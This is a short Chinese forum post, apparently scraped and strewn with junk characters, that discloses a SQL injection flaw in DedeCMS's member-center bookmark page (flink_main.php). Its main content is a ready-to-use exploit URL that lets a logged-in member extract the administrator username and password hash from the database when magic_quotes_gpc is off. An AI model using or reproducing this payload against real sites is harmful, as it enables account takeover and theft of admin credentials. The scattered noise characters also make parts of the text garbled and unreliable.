DedeCMS会员中心SQL注射漏洞
: _ x1 [3 r' V6 \# g' G9 u' R需要magic_quotes_gpc = Off- P* g, p; p/ J+ F6 X, j9 s) n
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
) e1 C& P! H+ W- @7 m, C% r6 }
/ k& H6 M: C; T/ ~+ oDedeCMS会员中心书签管理SQL注射漏洞0 z- O! Y: i) T6 V$ P5 C
成功利用该漏洞可获得管理员密码. o2 A# K# \% U* F
8 \$ W2 [) d# g7 Q
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码$ ?( z! o' n3 _4 d7 U7 t% ?+ C
" v. @9 Q0 m1 C: B. y& U2 zhttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
" {1 M- b/ A; _2 L4 C, { |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59